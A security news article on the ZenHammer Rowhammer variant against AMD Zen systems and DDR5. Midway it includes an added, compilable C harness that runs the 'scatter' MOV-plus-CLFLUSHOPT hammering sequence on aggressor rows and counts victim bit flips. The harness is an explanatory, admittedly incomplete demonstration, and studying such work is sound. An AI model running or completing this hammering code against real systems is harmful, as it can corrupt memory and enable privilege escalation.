ZenHammer Attack Gets Around AMD CPUs' Rowhammer Defenses
ETH Zurich researchers have, for the first time, demonstrated a RowHammer variant, which they call ZenHammer, that triggers bit flips on AMD Zen 2 and Zen 3 systems despite DRAM (dynamic random-access memory) mitigations such as Target Row Refresh (TRR).
"This result proves that AMD systems are equally vulnerable to Rowhammer as Intel systems, which greatly increases the attack surface, considering today's AMD market share of around 36% on x86 desktop CPUs," the investigators stated.
The method, known as ZenHammer, also marks the first instance of bit flips caused by RowHammer on DDR5 chips.
The well-known RowHammer attack originally surfaced in 2014. It exploits the cell architecture of DRAM: repeatedly activating a specific row (a technique known as "hammering") disturbs the physically adjacent rows and causes their capacitor cells to leak charge.
The result can be bit flips in the adjacent memory rows (0 to 1, or vice versa) that change the contents of memory without any write being issued, which an attacker can turn into privilege escalation and use to compromise system availability, integrity, and credentials.
ZenHammer builds on this physical proximity of cells within the memory array, and the problem is expected to worsen as DRAM technology scales down and storage density increases.
In a paper published in November 2022, ETH Zurich researchers noted that "as DRAM continues to scale, RowHammer bit flips can occur at smaller activation counts and thus a benign workload's DRAM row activation rates can approach or even exceed the RowHammer threshold."
"Thus, a system may experience bit flips or frequently trigger RowHammer defence mechanisms even without a malicious party performing a RowHammer attack in the system, leading to data corruption or significant performance degradation."
Target Row Refresh (TRR) is a broad term for the in-DRAM mechanisms that manufacturers use to counter RowHammer, and it is one of the most important mitigations. A TRR mechanism tracks rows that are being activated unusually often (the aggressors) and issues additional refreshes to the rows next to them (the potential victims), restoring their charge before it drains far enough for a bit to flip.
Like TRRespass and SMASH before it, ZenHammer circumvents TRR by reverse-engineering the secret DRAM address functions used on AMD systems and by improving refresh synchronization and the scheduling of flush and fence instructions. With this, the researchers triggered bit flips on seven of the ten Zen 2 devices and six of the ten Zen 3 devices they sampled.
The study also determined the instruction sequence that maximizes the row activation rate, which makes hammering more effective.
"Our results showed that regular loads (MOV) with CLFLUSHOPT for flushing aggressors from the cache, issued immediately after accessing an aggressor ('scatter' style), is optimal," according to the investigators.
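As an added example, not code from the ZenHammer paper or its authors, the C harness below contrasts the two instruction orderings the quote refers to: "scatter" (a MOV from one aggressor, CLFLUSHOPT on that same aggressor immediately after, then the next aggressor) against the batched alternative (load every aggressor, then flush them all), with an MFENCE closing each round. It falls back to CLFLUSH when CPUID reports no CLFLUSHOPT, and it stays buildable on non-x86 machines without hammering. The row layout is a placeholder assumption: it treats 8 KiB-aligned chunks as rows and lays out a double-sided stripe pattern (aggressors 0x00, victims 0xFF). It does not pick same-bank, physically adjacent rows, because that requires the reverse-engineered address functions, and it does not synchronize with refresh, so a run on ordinary hardware is not expected to produce flips. What it shows is the access sequence itself and how a victim-row check is done.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Row geometry for this example only. A fixed 8 KiB stride is a placeholder:
 * choosing real same-bank, adjacent rows requires the reverse-engineered DRAM
 * address functions, which are not reproduced here. */
#define ROW_BYTES   8192u
#define NUM_ROWS    5u
#define AGGR_FILL   0x00
#define VICTIM_FILL 0xFF

#if defined(__x86_64__)
#include <cpuid.h>

/* CPUID.(EAX=7,ECX=0):EBX bit 23 reports CLFLUSHOPT support. */
static int have_clflushopt(void)
{
    unsigned a = 0, b = 0, c = 0, d = 0;
    if (!__get_cpuid_count(7, 0, &a, &b, &c, &d))
        return 0;
    return (int)((b >> 23) & 1u);
}

/* A plain MOV load: this is the access that activates the aggressor row. */
static inline void load_row(const volatile uint8_t *p)
{
    __asm__ volatile("movq (%0), %%rax" : : "r"(p) : "rax", "memory");
}

/* Evict the aggressor's cache line so the next MOV goes to DRAM again. */
static inline void flush_row(const volatile uint8_t *p, int use_opt)
{
    if (use_opt)
        __asm__ volatile("clflushopt (%0)" : : "r"(p) : "memory");
    else
        __asm__ volatile("clflush (%0)" : : "r"(p) : "memory");
}

static inline void fence(void) { __asm__ volatile("mfence" : : : "memory"); }
#else
/* Portable fallback so the file builds on other architectures; it does not hammer. */
static int have_clflushopt(void) { return 0; }
static inline void load_row(const volatile uint8_t *p) { (void)*p; }
static inline void flush_row(const volatile uint8_t *p, int use_opt) { (void)p; (void)use_opt; }
static inline void fence(void) { __atomic_thread_fence(__ATOMIC_SEQ_CST); }
#endif

/* "Scatter" ordering: flush each aggressor immediately after loading it.
 * Returns the number of row activations issued. */
static unsigned long hammer_scatter(volatile uint8_t **aggr, size_t n,
                                    unsigned long rounds, int use_opt)
{
    unsigned long acts = 0;
    for (unsigned long r = 0; r < rounds; r++) {
        for (size_t i = 0; i < n; i++) {
            load_row(aggr[i]);
            flush_row(aggr[i], use_opt);
            acts++;
        }
        fence();
    }
    return acts;
}

/* "Batched" ordering for comparison: load all aggressors, then flush all. */
static unsigned long hammer_batched(volatile uint8_t **aggr, size_t n,
                                    unsigned long rounds, int use_opt)
{
    unsigned long acts = 0;
    for (unsigned long r = 0; r < rounds; r++) {
        for (size_t i = 0; i < n; i++) { load_row(aggr[i]); acts++; }
        for (size_t i = 0; i < n; i++) flush_row(aggr[i], use_opt);
        fence();
    }
    return acts;
}

/* Count bits that differ from the pattern the rows were filled with. */
static unsigned long count_bit_flips(const uint8_t *buf, size_t len, uint8_t expected)
{
    unsigned long flips = 0;
    for (size_t i = 0; i < len; i++)
        flips += (unsigned long)__builtin_popcount((unsigned)(buf[i] ^ expected));
    return flips;
}

struct hammer_result { unsigned long activations; unsigned long flips; int used_clflushopt; };

/* Double-sided layout: rows 1 and 3 are aggressors (0x00), rows 0, 2 and 4 are
 * victims (0xFF); the stripe pattern maximizes the charge difference between
 * neighbouring cells. Returns activations issued and victim bits that changed. */
static struct hammer_result hammer_experiment(unsigned long rounds, int scatter)
{
    struct hammer_result res = { 0, 0, have_clflushopt() };
    uint8_t *buf = aligned_alloc(ROW_BYTES, ROW_BYTES * NUM_ROWS);
    if (!buf) return res;
    for (unsigned i = 0; i < NUM_ROWS; i++)
        memset(buf + i * ROW_BYTES, (i == 1 || i == 3) ? AGGR_FILL : VICTIM_FILL, ROW_BYTES);
    volatile uint8_t *aggr[2] = { buf + 1 * ROW_BYTES, buf + 3 * ROW_BYTES };
    res.activations = scatter ? hammer_scatter(aggr, 2, rounds, res.used_clflushopt)
                              : hammer_batched(aggr, 2, rounds, res.used_clflushopt);
    for (unsigned i = 0; i < NUM_ROWS; i += 2)   /* victim rows 0, 2, 4 */
        res.flips += count_bit_flips(buf + i * ROW_BYTES, ROW_BYTES, VICTIM_FILL);
    free(buf);
    return res;
}

/* Deterministic check of the flip counter on a constructed row with three bits cleared. */
static unsigned long selftest_flip_counter(void)
{
    uint8_t row[64];
    memset(row, VICTIM_FILL, sizeof row);
    row[5] ^= 0x01; row[17] ^= 0x80; row[40] ^= 0x10;
    return count_bit_flips(row, sizeof row, VICTIM_FILL);   /* 3 */
}

int main(void)
{
    struct hammer_result r = hammer_experiment(200000, 1);
    printf("clflushopt=%d activations=%lu victim bit flips=%lu\n",
           r.used_clflushopt, r.activations, r.flips);
    return 0;
}
```

The activation count is returned rather than a measured rate because wall-clock timing of the two orderings is what the paper's comparison is about and varies by machine; to reproduce that comparison, time `hammer_experiment(rounds, 1)` against `hammer_experiment(rounds, 0)` with `clock_gettime` and divide activations by elapsed time. A non-zero `flips` on real hardware is a genuine bit flip and should be treated as such.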
ZenHammer is also the first technique to trigger RowHammer bit flips on a DDR5 system, on AMD's Zen 4 microarchitecture. That result, however, was limited to one of the ten DDR5 devices examined, tested on a Ryzen 7 7700X.
DDR5 DRAM modules had been thought to be resistant to RowHammer attacks because they replaced TRR with a new defense known as refresh management.
The investigators stated, "The changes in DDR5, such as improved RowHammer mitigations, on-die error correction code (ECC), and a higher refresh rate (32 ms), make it harder to trigger bit flips."
"Given the lack of bit flips on nine of 10 DDR5 devices, more work is needed to better understand the potentially new RowHammer mitigations and their security guarantees."
In a security bulletin, AMD stated that it is evaluating RowHammer bit flips on DDR5 devices and would offer an update when the assessment is finished.
"AMD microprocessor products include memory controllers designed to meet industry-standard DDR specifications," it stated. "Susceptibility to ZenHammer Attack varies based on the DRAM device, vendor, technology, and system settings."